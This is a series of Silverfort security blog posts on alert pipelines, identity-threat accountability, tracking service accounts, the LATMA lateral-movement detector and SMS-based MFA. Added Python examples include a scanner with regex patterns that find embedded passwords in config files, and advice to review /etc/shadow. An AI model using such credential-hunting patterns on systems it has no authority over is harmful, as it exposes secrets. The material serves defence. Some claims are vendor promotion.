This is attained first by making the Alerts Memory Table an actual table and not a view. It collects alerts over time that we can use to see statistics. Most importantly, making it a table means it is stored, which in turn means we can build multiple processes on top of it (e.g. for multiple channels requiring various levels of aggregation and/or filtering).

#### Standardization

Each pipeline must end with the data having a standard structure. This ensures that we have a single alert type per customer and date in each row, which makes adding more alert types straightforward: we don’t have to change the schema and add additional columns; we can simply add more rows that contain the information about the new alerts with the same schema as previous alerts. Also, since all pipelines must abide by this standard, they can be unified by simply using a UNION ALL between them. To get to this form in each pipeline, we first aggregate the data to get a column for each alert. Then we apply an UNPIVOT to the view to get it into its standard form.

#### Automation

Since we don’t want to worry about having to update schemas or ensuring new alerts propagate upwards, we automate the process to detect new alerts. This is done via the unpivot process, which converts the alerts from columns to rows. Because dynamic unpivot (over a dynamic set of columns) is not natively supported in SQL, I used a Snowflake procedure and scheduled tasks to apply this automation. The procedure unpivots a view on the list of alert columns and creates the unpivot view. The scheduled task invokes the procedure for every view needing the unpivot, to detect whether a new alert has been added. Thus new alerts are turned into rows automatically.
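As an added illustration of the standard-form and dynamic-unpivot steps described above (example code, not the post's own Snowflake procedure), the following Python generates the UNPIVOT view DDL from a view's column list and replays the transformation in memory on sample rows, so the shape every pipeline must end in, and why a plain UNION ALL then suffices, is visible. View names, column names and rows are constructed, and reading the column list from INFORMATION_SCHEMA.COLUMNS is an assumption the post does not state.

```python
"""Standard-form step of the alert pipeline architecture described above.

Added example, not Silverfort's code: view names, column names and the
sample rows are constructed for illustration.
"""
from __future__ import annotations

from typing import Any, Iterable

# Columns that identify a row; everything else is an alert column.
KEY_COLUMNS = ("CUSTOMER_ID", "ALERT_DATE")


def alert_columns(view_columns: Iterable[str]) -> list[str]:
    """Non-key columns of an aggregated pipeline view.

    Assumption: in Snowflake the procedure would read this list from
    INFORMATION_SCHEMA.COLUMNS on each scheduled run, so an alert column
    added to the aggregation view is picked up without touching any view
    further up the pipeline.
    """
    return [c for c in view_columns if c.upper() not in KEY_COLUMNS]


def build_unpivot_view_sql(source_view: str, view_columns: Iterable[str],
                           target_view: str) -> str:
    """Generate the DDL the dynamic-unpivot procedure would execute.

    The IN (...) list of the UNPIVOT clause is rebuilt from the source
    view's current columns, which is what makes the unpivot "dynamic".
    """
    cols = alert_columns(view_columns)
    if not cols:
        raise ValueError(f"{source_view} has no alert columns to unpivot")
    return (
        f"CREATE OR REPLACE VIEW {target_view} AS\n"
        f"SELECT {', '.join(KEY_COLUMNS)}, ALERT_TYPE, ALERT_COUNT\n"
        f"FROM {source_view}\n"
        f"UNPIVOT (ALERT_COUNT FOR ALERT_TYPE IN ({', '.join(cols)}))"
    )


def unpivot_rows(rows: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """In-memory equivalent of the UNPIVOT: one wide row per customer/date
    becomes one standard-form row per alert type that fired.

    NULL alert values are skipped, as Snowflake's UNPIVOT does by default,
    so an alert that did not fire produces no row.
    """
    out: list[dict[str, Any]] = []
    for row in rows:
        keys = {k: row[k] for k in KEY_COLUMNS}
        for col in alert_columns(row.keys()):
            if row[col] is None:
                continue
            out.append({**keys, "ALERT_TYPE": col, "ALERT_COUNT": row[col]})
    return out


def union_all(*pipelines: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """UNION ALL of standard-form outputs is plain concatenation, because
    every pipeline ends with the same four columns."""
    merged: list[dict[str, Any]] = []
    for rows in pipelines:
        merged.extend(rows)
    return merged


# Constructed output of two aggregation views. Pipeline A holds alerts
# computed per user, pipeline B alerts computed per source IP; they share
# nothing but the standard form they are unpivoted into.
PIPELINE_A_WIDE = [
    {"CUSTOMER_ID": "c1", "ALERT_DATE": "2023-06-01",
     "BRUTE_FORCE_USERS": 3, "NEW_ADMIN_LOGONS": None},
    {"CUSTOMER_ID": "c2", "ALERT_DATE": "2023-06-01",
     "BRUTE_FORCE_USERS": None, "NEW_ADMIN_LOGONS": 1},
]
PIPELINE_B_WIDE = [
    {"CUSTOMER_ID": "c1", "ALERT_DATE": "2023-06-01", "RARE_SOURCE_IPS": 7},
]


def standard_form_alerts() -> list[dict[str, Any]]:
    """What would land in the Alerts Memory Table for the sample above."""
    return union_all(unpivot_rows(PIPELINE_A_WIDE), unpivot_rows(PIPELINE_B_WIDE))


if __name__ == "__main__":
    print(build_unpivot_view_sql(
        "ALERTS_USERS_AGG",
        ["CUSTOMER_ID", "ALERT_DATE", "BRUTE_FORCE_USERS", "NEW_ADMIN_LOGONS"],
        "ALERTS_USERS_STD"))
    for r in standard_form_alerts():
        print(r)
```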
(Figure: A procedure to dynamically unpivot from a view to a new view)

### How Everything Is Performing

I am happy to report that, thus far, there have been vast improvements — not only in performance (which seems to be more than 10X faster using the same computing power) and lower running costs, but also because using the system is more comfortable. Since the launch of this new iteration, I have added new alerts with much more complex logic. So far, this has been a much better experience in terms of faster debugging and testing as well as implementing changes. Adding a new alert is now a matter of writing a simple SQL query and making sure the pipeline updates at key places. Everything can be done – including testing – in less than half an hour. As for the rest, I no longer have to worry about it.

---

- Published: 2023-06-07
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/mind-the-gap-whos-accountable-to-protect-against-identity-threats-in-your-organization/

Identity threats (i.e., the use of compromised credentials for malicious access to targeted resources) have become the dominant element of today’s threat landscape. Moreover, these are the threats that organizations find the hardest to protect against, with lateral movement and ransomware spread causing widespread damage on a seemingly daily basis. Yet, within most organizations there is in fact a gap in terms of who is actually accountable to prevent these attacks. And this gap is one of the fundamental reasons that organizations struggle to gain the upper hand against identity threats. In this post, we’ll discuss this gap by examining a sample use case, with the purpose of prompting all cybersecurity professionals to reflect on how present this gap is in their organization and how it can be resolved.

### Identity Teams are Not Accountable for Preventing Cyberattacks

Meet Jack. Jack is an Identity and Access Management (IAM) engineer at his company.
Part of Jack’s role is to implement multifactor authentication (MFA) protection on his users’ access. Being a consummate professional, Jack evaluates, purchases, and deploys an MFA solution on all of his company’s SaaS and web apps, as well as for remote VPN access to the on-prem environment and Remote Desktop Protocol (RDP) access within it. But because MFA for RDP entails installing an agent on each server in the environment, the decision is made not to deploy this on a specific group of older servers that support several business-critical apps. The concern here is that the additional load of the MFA agents will crash these servers, leading to unacceptable downtime. So the project is considered successful given these considerations.

### Security Teams are Not Accountable for Evaluating and Deploying Identity Protection Products

Now meet Jill, who is a Security Operations Center (SOC) manager on her company’s security team. Her KPI is to prevent, detect, and respond to cyberattacks. Jill is aware that ransomware attacks which spread across the enterprise environment are a critical threat. Adversaries accomplish this spread by using compromised user credentials to log in to as many machines as possible. To prevent this, Jill’s team invests significant effort in responding to alerts and proactively hunting for anomalous user access that could indicate such a spread is taking place. However, neither Jill nor anyone from her team has been involved in the evaluation, testing, and rollout of the MFA solution that is now in place across their enterprise’s environment. Because her focus is squarely on cyberattacks, her only reaction is being happy to hear that the MFA project was successfully completed.

### The Result: Cyberattacks That Include Identity Threats Encounter Little Defense

One day ransomware hits. The adversaries realize the organization’s app servers are the best target to hold hostage.
To gain control of these servers and encrypt the data on them, they attempt to log in via RDP using a compromised user’s credentials. And since there’s no MFA on these servers, the attempt is successful. Now the adversaries are in full control and can impose their ransomware demands on the organization. Let’s leave our story and reflect on what happened here.

### Lessons Learned: When No One Owns The Risk, The Risk Owns You

So what made this breach possible, despite there being dedicated and talented identity and security teams in place? The answer is in how Jack and Jill perceive the role they’ve been assigned in their organization. For his part, Jack was not tasked with preventing ransomware spread but rather with deploying an MFA solution. From his perspective, the servers without MFA protection weren’t seen as a security risk but instead as a missing percentage in the project’s overall MFA coverage rate. And a coverage rate of 90% is significantly better than the previous rate of 0%. Best efforts were made and, while results weren’t perfect, they were definitely good enough.

Jill, on the other hand, had no part whatsoever in the MFA project. Unlike a SIEM or an EDR, MFA is not considered a security product but rather a focus of the identity team. Had Jill been involved in the MFA discussions, she might have discovered that the app servers were exposed and pushed to upgrade them so that the MFA project would not be considered complete before these servers were fully protected.

So is Jack to blame for the breach? Not really, because this was never part of his responsibility. Does that mean Jill is to blame for the partial MFA coverage? Not really, because MFA has never been part of her jurisdiction. And this is exactly the accountability gap we’re talking about.

### Could an Accountability Gap Exist in Your Environment?

This story is a good example of the state of identity protection today.
How this accountability gap developed and why it is found only within identity protection (unlike endpoint or network protection) is worth a separate discussion. What’s more important is for you to ask if a similar scenario could take place in your environment. Here are some key questions to ask yourself:

- Is your SecOps team involved in implementing identity protection controls such as MFA and PAM?
- Does your CISO have a say in the design and implementation of the IAM infrastructure?
- Does your identity team realize that the solutions they evaluate and deploy are actually the last line of defense against attacks that could put the entire organization at risk?
- And the most important question: Is there a single stakeholder in your organization who has both the accountability to prevent identity threats as well as the authority and knowledge to determine the security measures that should be put in place to achieve this?

This is not to say that identity protection will be complete after resolving the accountability gap. Certainly, there are other challenges to overcome before getting there. But it is an essential first step to take in order to make this protection possible. Ultimately, whether the accountable person comes from the identity side or the security team doesn’t matter. As long as there is a clear owner in your organization, the initial milestone of getting the upper hand over identity threats will be accomplished.

---

- Published: 2023-06-07
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/guide-to-tracking-service-account-usage/

Service accounts are powerful tools that perform important automated functions within IT systems, but they can also pose significant risks if they become compromised.
Monitoring service account usage is critical to maintaining security and compliance, but many organizations struggle with gaining full visibility into exactly how many of these accounts they have, not to mention how they’re actually being leveraged across the environment. This is why uncovering the trails of service account activity requires a methodical approach across all systems, logs, and accounts. In this guide, we will explore how to thoroughly track service account usage across your organization using a layered monitoring methodology. With the right solution and techniques, your organization can uncover the trails of service account activity and ensure they are not leading to potential breaches and ransomware attacks.

### How to Find Where a Service Account is Being Used

#### Step 1: Review Active Directory for Existing Service Accounts

To uncover where service accounts are being used in your environment, the first step is to review Active Directory (AD) for existing service accounts. Service accounts are used by applications and services to access resources, so identifying them can provide insight into which systems may be accessing what data. Within Active Directory Users and Computers, you can filter user accounts to only show service accounts. Service accounts typically follow a naming convention like “SVC_” or “SERVICE_” to differentiate them from standard user accounts. Review each service account to determine:

- What application or service it is used by. The name or description field may provide details on what system uses the account.
- What privileges it has been granted. Service accounts are often given elevated rights to access resources, so understanding the level of access is important.
- When the password was last changed. Service account passwords should be complex and rotated regularly according to your organization’s policy.
- If the account is still actively being used. Disable any unused service accounts to reduce the attack surface.
- If the account requires additional monitoring or security controls. Privileged service accounts may necessitate extra safeguards, such as the creation of access control policies.

Once you have cataloged any existing service accounts in your Active Directory, you can compare them against your organization’s list of approved applications and services. Look for any unauthorized or unrecognized service accounts, as these could indicate compromised credentials or a malicious insider threat. Remove or disable them immediately. For authorized service accounts, enable logging and monitoring to track their activity and usage over time. Look for solutions that can provide real-time monitoring of service accounts, detecting anomalies in behavior that could signal account compromise or misuse. Continuously analyzing service account activity is critical for understanding where these accounts are being used in your environment and ensuring they remain secure at all times. For more on this, check our comprehensive guide on how to find service accounts in Active Directory.

#### Step 2: Check for Service Accounts in Entra ID

To uncover where service accounts are being used in Microsoft Entra ID, log in to the portal and navigate to the ID section, then under Manage select Enterprise applications. This will display a list of all applications in the tenant. Look for applications with “service account” in the name. These are the accounts created by Entra services to access resources. Select an application and click Properties to view details like app ID, sign-on URL, and group membership. The group membership will show which Entra resources the service account has access to.
Some common Entra service accounts to look for include:

- Entra ID Service Account: Used by Entra ID to access resources
- Entra DNS Service Account: Used by Entra DNS to access DNS zones
- Entra Policy Service Account: Used by Entra Policy to access resources for compliance evaluation
- Log Analytics Service Account: Used by Log Analytics to access resources for monitoring

To discover the permissions of a service account, check its role assignments. This can uncover whether the account has unnecessarily high levels of access. Select the service account and click Role assignments under Manage. This will list the roles assigned to the service account and the resources/scopes it has access to. Look for any roles granting admin-level access, like Owner or Contributor on high-value resources. If found, these roles should immediately be reduced to least privilege. Some key points to consider when reviewing service accounts:

- Only Entra services should create service accounts. Any service accounts created manually should be investigated.
- Service accounts should have only the minimal access needed to perform their intended functions. Broad access increases the risk of compromised accounts.
- Monitor service account login activity for signs of suspicious access. Entra ID Premium provides tools to detect risky logins.
- Implement strong security controls like digital fencing, conditional access, and privileged identity management to help secure service accounts.

In summary, regularly reviewing service accounts and their access permissions is key to reducing the threat of compromised accounts. Tightly controlling service accounts helps ensure secure and compliant access to resources.

#### Step 3: Scan Your IT Infrastructure for Service Account Usage

To uncover where your service accounts are being used across your IT infrastructure, you'll need to thoroughly scan each system. This involves using both automated scanning tools as well as conducting manual inspections of critical systems.
##### Review Account Permissions

Review the permissions assigned to each service account on all systems. Look for accounts with broad and unnecessary access that could facilitate lateral movement if compromised. Prune permissions and roles so that each account has only the least amount of access needed in order to conduct its activities properly.

##### Check for Embedded Passwords

Scan all scripts, configuration files, and code repositories for any embedded service account credentials. These hardcoded passwords can pose a serious security risk if they are uncovered by malicious actors. So be sure to remove any embedded passwords that are found and store all credentials in a secure secrets-management solution instead.

##### Inspect for Account Misuse

Closely inspect systems and applications that integrate with your service accounts for any signs of misuse or compromise. Look for anomalous logins, file executions or changes, or other suspicious account activity that could indicate a potential breach. Revoke access immediately if any unauthorized access is detected.

##### Deploy Monitoring Tools

Use monitoring tools to gain full visibility into service account behavior and detect threats. It’s important to build a baseline of normal activity for each account so that you can then detect any deviations that could signal compromise or misuse, enabling a rapid response.

##### Repeat Scans Regularly

Conducting regular scans of your IT infrastructure is one key to managing service account security risks. Repeat the steps outlined above on a continuous basis to uncover any new issues as they emerge. Schedule scans to run automatically on a weekly or monthly basis in order to get the most comprehensive insight into your service account landscape. Staying on top of service account usage with frequent scanning and monitoring is essential in order to reduce the risks associated with highly privileged accounts.
Although time consuming, these proactive steps can help prevent a serious breach resulting from a compromised service account. Continuous visibility and review will give you assurance that this critical aspect of your infrastructure security is being properly managed.

#### Step 4: Review Configuration Files on Servers and Applications

Reviewing configuration files on servers and applications is an additional important step in tracking service account usage. These files contain details on how service accounts are configured and the specific permissions they’ve been granted. To review configuration files, you need to log into all servers and applications that service accounts have access to. Look for files with names like “config.xml,” “app.config,” or “web.config.” In Linux and Unix systems, also check the “/etc/passwd,” “/etc/group,” and “/etc/shadow” files. Once you locate these configuration files, review them for any mentions of service account names. For example, look for sections on:

- Authentication: See what credentials and permissions service accounts are using to log in. The files may specify the account names, passwords, and login methods.
- Authorization: Check what level of access each service account has — like read, write, or admin permissions. The configuration files will list the specific resources, files, and data that the accounts can modify or view.
- Roles and Responsibilities: Some files may outline the intended usage and responsibilities of your service accounts. See if the current configuration aligns with the documented usage. Be sure to look for any deviations that could indicate malicious activity or account misuse.
- Dependencies: The configuration files may indicate other systems, applications, or resources that the service accounts rely on or integrate with. These dependencies can provide more areas to investigate for traces of the service accounts.
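An added example (not Silverfort's code) for the embedded-password check in Step 3 and the configuration-file review in Step 4: it scans constructed config and script contents for the SVC_/SERVICE_ naming convention from Step 1, flags mentions that sit next to a credential value, and marks accounts missing from the approved inventory, without ever storing the secret itself. The file contents, account names, credential patterns and inventory are all assumptions.

```python
"""Scan configuration files and scripts for service account references and
embedded credentials. Added example for the checks described above, not
Silverfort's code: file contents, account names and secrets are constructed."""
import re
from collections import namedtuple

# Naming convention from Step 1: service accounts start with SVC_ or SERVICE_.
SERVICE_ACCOUNT_RE = re.compile(r"\b((?:SVC|SERVICE)_[A-Za-z0-9_]+)\b", re.IGNORECASE)

# Ways a credential commonly sits next to an account reference: key=value pairs
# and connection strings, or an appSettings <add key="...Password" value="..."/>.
CREDENTIAL_PATTERNS = [
    re.compile(r"password\s*=\s*\S+", re.IGNORECASE),
    re.compile(r'<add\s+key="[^"]*(?:password|secret)[^"]*"\s+value="[^"]+"', re.IGNORECASE),
]

Finding = namedtuple("Finding", "path line_no account near_credential")


def scan_file(path, content, proximity=2):
    """One Finding per service account mention. A mention is flagged when a
    credential pattern appears within `proximity` lines of it, so a user and
    password split over two config lines is still caught. Secret values are
    never stored or returned, only the fact that one is present."""
    mentions, cred_lines = [], set()
    for no, line in enumerate(content.splitlines(), start=1):
        mentions += [(no, m.group(1).upper()) for m in SERVICE_ACCOUNT_RE.finditer(line)]
        if any(p.search(line) for p in CREDENTIAL_PATTERNS):
            cred_lines.add(no)
    return [Finding(path, no, acct, any(abs(no - c) <= proximity for c in cred_lines))
            for no, acct in mentions]


def report(files, approved):
    """Per account: where it is referenced, whether a credential is embedded
    next to it, and whether it is in the approved inventory from Step 1."""
    summary = {}
    for path, content in files.items():
        for f in scan_file(path, content):
            entry = summary.setdefault(f.account, {
                "files": set(), "embedded_credential": False,
                "approved": f.account in approved})
            entry["files"].add(path)
            entry["embedded_credential"] |= f.near_credential
    return summary


# Constructed sample files; every secret value here is fake.
SAMPLE_FILES = {
    "web.config": """<configuration>
  <connectionStrings>
    <add name="CrmDb" connectionString="Server=sql01;Database=crm;User ID=SVC_CRM;Password=Fake123!" />
  </connectionStrings>
  <appSettings>
    <add key="ReportUser" value="SVC_REPORTS" />
    <add key="ReportPassword" value="fakepass" />
  </appSettings>
</configuration>""",
    "backup.sh": """#!/bin/sh
export BACKUP_USER=SVC_BACKUP
export BACKUP_PASSWORD=fakepass
/opt/backup/run --user "$BACKUP_USER"
""",
    "cron.d/sync": "0 3 * * * svc_sync /usr/local/bin/sync.sh\n",
}
APPROVED = {"SVC_CRM", "SVC_REPORTS", "SVC_BACKUP"}  # inventory from Step 1

if __name__ == "__main__":
    for acct, info in sorted(report(SAMPLE_FILES, APPROVED).items()):
        print(acct, sorted(info["files"]),
              "EMBEDDED CREDENTIAL" if info["embedded_credential"] else "",
              "" if info["approved"] else "NOT IN INVENTORY")
```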
Reviewing server and application configuration files provides valuable insight into how service accounts are set up and used in the environment. Comparing the configuration details with actual account activity and usage can uncover irregularities that point to compromised or misused accounts. The best solutions can automate the discovery and analysis of service accounts across systems to streamline this tracing process.

#### Step 5: Leverage a Service Account Management Solution

A service account management solution offers the ideal way to gain visibility into and control over service account usage. These purpose-built tools are designed specifically for managing service accounts at scale. They provide a centralized place to discover all service accounts across an environment, monitor them for anomalies, and put strong access controls in place.

##### Comprehensive Discovery

A service account management solution should employ advanced discovery techniques to uncover all service accounts, including those that may be “orphaned” or improperly configured. It scans domains, databases, applications, and more to build a complete inventory of accounts. This full visibility is essential for closing security gaps and reducing risk.

##### Continuous Monitoring

Once all service accounts have been discovered, the solution should be able to monitor them constantly for any unusual activity that could indicate their compromise. It should establish a baseline of normal behavior for each account and then be able to send alerts if there are any deviations from the norm, or even block access altogether. This 24/7 monitoring should work across all accounts and systems in order to detect potential threats immediately.

##### Granular Access Control

The right service account management solution should be able to enforce least-privilege access by allowing admins to implement granular levels of access control and entitlement reviews.
For example, they should be able to grant service accounts just enough access to perform their specific functions and nothing more. There should also be a capability to schedule regular reviews of entitlements to ensure accounts do not accumulate unnecessary permissions over time. These controls can mitigate any damage done if a service account is compromised.

### Silverfort: The Leader in Service Account Protection

Silverfort is the industry leader when it comes to service account protection. The Silverfort solution can discover all service accounts across both cloud and on-prem environments, monitor them continuously, and allow granular access control to reduce risk. With Silverfort, organizations will gain full visibility and control over all service accounts so that they can finally close security gaps and stop threats like data breaches and ransomware. Furthermore, Silverfort delivers a purpose-built solution for unified identity protection that can secure all user accounts – including service accounts – at scale.

### What Are Service Accounts and Why Are They Important?

Service accounts are administrative accounts located within operating systems and applications that run automated processes and tasks. They are crucial for system and application functionality but can also become attack vectors for malicious actors. This is why closely monitoring and tracking service account use is crucial for organizations.

### Common Ways Service Accounts Are Used in an Enterprise Environment

Service accounts are commonly used by applications and automated processes in enterprises to access resources and perform certain actions. There are a few common ways service accounts are used:

#### Application Access

Service accounts are often used by applications to access data and APIs. For example, a CRM application may use a service account to access a...
---

- Published: 2023-06-05
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/introducing-the-latma-algorithm-for-better-lateral-movement-detection/

Lateral movement detection is a challenge every cybersecurity researcher is likely familiar with. My team and I faced this challenge a few months ago and, not surprisingly, quickly discovered there is no easy or fast solution to address it. In this post, I’ll explain the challenge of detecting lateral movement and show you how my team and I significantly improved our ability to detect it with our Lateral Movement Analyzer (LATMA) tool. I’ll discuss the details of this algorithm and explain how it was able to get much better results than others currently available. If you're a practitioner, listen up! Because I’m going to share how you can use our new open-source tool to detect lateral movement in your environment.

### Understanding Lateral Movement By Examining a Recent Attack

Before discussing the detection of lateral movement, let’s first define exactly what it is. And there’s no better way to do this than by using an example. A few months ago, hackers from the cybercriminal group Lapsus$ got access to Uber’s systems via a VPN with regular user credentials they acquired using a social engineering technique called “MFA bombing.” The attackers scanned the network to find valuable information and eventually found a PowerShell script that contained admin credentials. They then used this admin’s credentials to log in to a database and expose sensitive company information. This attack consisted of several steps:

1. Getting initial access to Uber’s systems — in this case through social engineering.
2. Searching for information and then using it to access other machines in the network and obtain privileged credentials.
3. Using these privileged credentials to fulfill a malicious objective — in this case, exposing sensitive information.

Those three steps occur in almost every successful breach.
However, only the second step is considered lateral movement, since it signals the attackers’ ability to move successfully across an organization’s network. This is the step I’ll focus on.

### Understanding the Role Authentication Plays in Lateral Movement

Movement between machines requires authentication. During this phase, the attacker needs to provide credentials to the identity provider, and only after these are verified can they advance to a target machine. The problem is that normal movement between machines requires authentication as much as malicious movement, and both leave the same traces. This makes distinguishing between normal and malicious movement very hard. One approach to tackling this is through the detection of anomalies. Taking this approach, however, has its own challenges, since many anomalies are actually not malicious. For example, when an employee goes to their IT department for help and the IT person logs in to the computer of the person who asked for assistance, this is an anomaly but obviously not a malicious one. Sadly, this is why simple anomaly detection algorithms are actually not very useful. This is why my team and I developed the LATMA algorithm, which overcomes this obstacle.

### The Three Steps to LATMA Detection

#### Step 1: Build a Graph for Abnormal Authentication Traffic

In this step, LATMA digests the entirety of authentication traffic in the organization and determines which authentications look normal and which appear abnormal. It does this using information about the domain, such as computer/user roles and their expected behavior. These authentications are then used to build a graph representing the network, where every node represents a computer and every edge represents an authentication. As mentioned previously, though, finding anomalies is not enough to detect lateral movement, so there are several more steps in the process.
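The three-step logic this post describes, as an added simplified example that is not the LATMA tool's own code: build a graph from abnormal authentications, classify each source machine's fan-out into search, advance or act patterns, and alert only when two patterns chain in time, so an isolated anomaly such as the helpdesk logon above never fires. The baseline rule standing in for LATMA's role-based logic, the thresholds, hosts, users and log lines are all constructed assumptions.

```python
"""Simplified LATMA-style detection over authentication logs. Added example,
not the LATMA project's code: hosts, users, thresholds and the sample log
are constructed for illustration."""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Auth = namedtuple("Auth", "ts user src dst")  # one edge of the graph
Pattern = namedtuple("Pattern", "kind source targets start end")


def parse_log(text):
    """Parse constructed 'timestamp user src dst' lines, sorted by time."""
    auths = [Auth(datetime.fromisoformat(ts), user, src, dst)
             for ts, user, src, dst in (ln.split() for ln in text.strip().splitlines())]
    return sorted(auths, key=lambda a: a.ts)


def build_abnormal_graph(auths, baseline):
    """Step 1: graph of abnormal authentications, indexed by source machine
    (node = machine, edge = authentication). Stand-in for LATMA's role and
    baseline logic: a (user, src, dst) triple never seen in the learning
    period is treated as abnormal (assumption)."""
    graph = defaultdict(list)
    for a in auths:
        if (a.user, a.src, a.dst) not in baseline:
            graph[a.src].append(a)
    return graph


def find_patterns(graph, search_min=4, act_min=5,
                  gap=timedelta(minutes=10), burst=timedelta(minutes=2)):
    """Step 2: split each source's abnormal edges into sessions (consecutive
    edges at most `gap` apart). A session reaching act_min+ targets within
    `burst` is an act, one reaching search_min+ targets is a search, and
    every other edge is a single advance hop."""
    patterns = []
    for src, edges in graph.items():
        session = [edges[0]]
        for a in edges[1:] + [None]:  # None flushes the last session
            if a is not None and a.ts - session[-1].ts <= gap:
                session.append(a)
                continue
            targets = frozenset(e.dst for e in session)
            start, end = session[0].ts, session[-1].ts
            if len(targets) >= act_min and end - start <= burst:
                patterns.append(Pattern("act", src, targets, start, end))
            elif len(targets) >= search_min:
                patterns.append(Pattern("search", src, targets, start, end))
            else:
                patterns += [Pattern("advance", src, frozenset([e.dst]), e.ts, e.ts)
                             for e in session]
            if a is not None:
                session = [a]
    return sorted(patterns, key=lambda p: p.start)


def chain_alerts(patterns):
    """Step 3: alert only on two patterns in sequence: the later one starts
    from a machine the earlier one reached (the attacker moved on), or a
    search is followed by an advance from the same source into one of the
    searched machines. A lone anomaly never alerts."""
    found = []
    for i, p1 in enumerate(patterns):
        for p2 in patterns[i + 1:]:
            if p2.start <= p1.end:
                continue
            moved_on = p2.source in p1.targets
            searched_then_advanced = (p1.kind == "search" and p2.kind == "advance"
                                      and p2.source == p1.source
                                      and p2.targets <= p1.targets)
            if moved_on or searched_then_advanced:
                found.append((p1, p2))
    return found


def detect(log_text, baseline):
    return chain_alerts(find_patterns(build_abnormal_graph(parse_log(log_text), baseline)))


# Constructed log: bob's one-off helpdesk logon is abnormal but isolated.
# alice fans out to four servers (search), later steps onto SRV03 (advance),
# stolen svc_backup credentials hop to SRV07 (advance), then hit five file
# servers within seconds (act).
SAMPLE_LOG = """
2023-05-10T08:15:00 alice WS01 FS01
2023-05-10T08:30:00 bob IT01 WS05
2023-05-10T09:00:00 alice WS01 SRV01
2023-05-10T09:01:00 alice WS01 SRV02
2023-05-10T09:02:30 alice WS01 SRV03
2023-05-10T09:04:00 alice WS01 SRV04
2023-05-10T09:20:00 alice WS01 SRV03
2023-05-10T09:30:00 svc_backup SRV03 SRV07
2023-05-10T09:45:00 svc_backup SRV07 FS01
2023-05-10T09:45:05 svc_backup SRV07 FS02
2023-05-10T09:45:10 svc_backup SRV07 FS03
2023-05-10T09:45:15 svc_backup SRV07 FS04
2023-05-10T09:45:20 svc_backup SRV07 FS05
"""
BASELINE = {("alice", "WS01", "FS01")}  # learned as normal, so filtered out
```

Running `detect(SAMPLE_LOG, BASELINE)` yields four chained alerts, all rooted in alice's search from WS01; bob's logon from IT01 produces an advance pattern but no alert.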
#### Step 2: Finding Patterns of Lateral Movement

In this step, we take the authentication graph from the previous step as input and search for lateral movement patterns. These patterns are associated with different types of malicious intent. We classify the patterns into three categories:

- Search patterns - Before attackers perform any movement, they will likely search for a good target to advance to. The pattern is: many authentications from a single source (representing the attacker's current location) to multiple servers.
- Advance patterns - These represent the attackers' movement between different network assets. The attackers might steal credentials along the way and then use them to advance.
- Act patterns - Usually these occur towards the end of the breach when the attackers have started to fulfill their malicious objectives. These patterns are often characterized by massive automatic access to multiple machines at once in order to steal information or run malware.

#### Step 3: Alerting

LATMA generates an alert when at least two of these patterns happen in sequence. For example, if the attacker searches for a target machine to advance to and then successfully advances to it, the algorithm generates an alert. In the example, the attack could have been stopped before the acting pattern, because the algorithm generates an alert if it detects an acting pattern connecting to another pattern. Acting patterns usually mean that the attacker has already fulfilled their objectives. In this case, the output of the algorithm can help with the investigation.

### Introducing LATMA: the Lateral Movement Analyzer Tool

As part of our research, we developed a free tool that implements LATMA’s logic and outputs a detailed report of all suspicious movements in the environment. The tool consists of two modules:

- Logs Collector - This module collects authentication traffic from the Active Directory (AD) environment.
  It gathers the logs from the domain controllers and endpoints, focusing only on interactive Kerberos and NTLM authentications. This module is open-source and can be found here: https://github.com/silverfort-open-source/latma
- Analyzer Module - This module takes as input the logs from the collector and outputs a detailed report containing the patterns that LATMA found, how they’re connected, and who performed them and when. It also visualizes the findings in a GIF. This module is free and can be found here: https://www.silverfort.com/resources/tools/lateral-movement-analyzer-tool-beta/

One of the advantages of this tool is that the results are readable and clear, because sometimes the hardest part in dealing with an alert is not just knowing that it happened but convincing your team that it was not a false alarm. LATMA’s straightforward output helps address this issue.

Watch this full demo of LATMA, from 16:54 - 30:44.

### The Proof of LATMA Is in the Results

If you’ve read this far, I hope you’re convinced that this algorithm and tool have value. So I also want to show you that it is extremely accurate. As part of my job at Silverfort, I get to see authentication traffic from hundreds of different environments, and you might be surprised to learn that many of them are targeted by lateral movement attempts. We know this because either our customer discovered this or Silverfort’s platform alerted us to it. That makes this data good for validation, training algorithms, and testing hypotheses. We ran LATMA on dozens of data sets from different environments. The bottom line is that it detected 95% of lateral movements and generated a false alarm approximately once every three days — almost 30 times better than other existing algorithms!

### Future Work: Where We’re Going With This

The work on the algorithm helped me and my team better understand and model lateral movement attacks. It also made me realize that, despite the significant improvement, there is still a long way to go.
Attack surfaces are evolving quickly and attackers have more and more opportunities to take advantage of this, for example by moving from an on-prem environment to the cloud and vice versa. So a potential enhancement to this algorithm would include logs and events from cloud environments and detection of lateral movement that crosses platforms. Stay tuned for more news around LATMA, and be sure to let us know your feedback about this tool.

---

- Published: 2023-06-01
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/uncovering-the-hidden-risks-of-mobile-device-security/

Organizations often encounter issues when trying to implement best practices in mobile device security while also ensuring a seamless user experience. This is because end users can be hesitant to install additional apps on their mobile device, while others engage in risky practices such as jailbreaking or rooting their phones, sometimes even using custom operating systems (OS) and altering the internal read-only memory (ROM). While these practices may not sound like cause for concern, let's examine in this blog post why they can actually pose a serious problem when it comes to device security.

### Why SMS and OTP Are Not Considered Secure for MFA

Back in 2017, the National Institute of Standards and Technology (NIST) deprecated the use of SMS messages for receiving multifactor authentication (MFA) or one-time passwords (OTP) as a security measure. Unfortunately these practices are still widely used today, but it’s important to understand why this method of authentication is no longer recommended. Although not immediately obvious, the answer is actually quite simple. When you receive a phone call or an SMS, you have no control over the security of your mobile phone provider's network. This means that the weakest link in your security chain is really the person behind the counter of your mobile phone provider.
With identity theft so common today, it can be shockingly easy for someone to impersonate you and thus obtain a completely new SIM card for your cell phone number without your knowledge. This is exactly why Silverfort does not recommend – or support – using phone calls or SMS texts for OTP codes. When you’re developing a security product, it’s important to strive for the highest standards even if this means a slight inconvenience.

## How Jailbreaking and Rooting Compromise Security

This brings us to another element of the security discussion: users who jailbreak or root their phones. Jailbreaking or rooting is not in itself the issue, but there are definitely security concerns that arise once these actions have been performed.

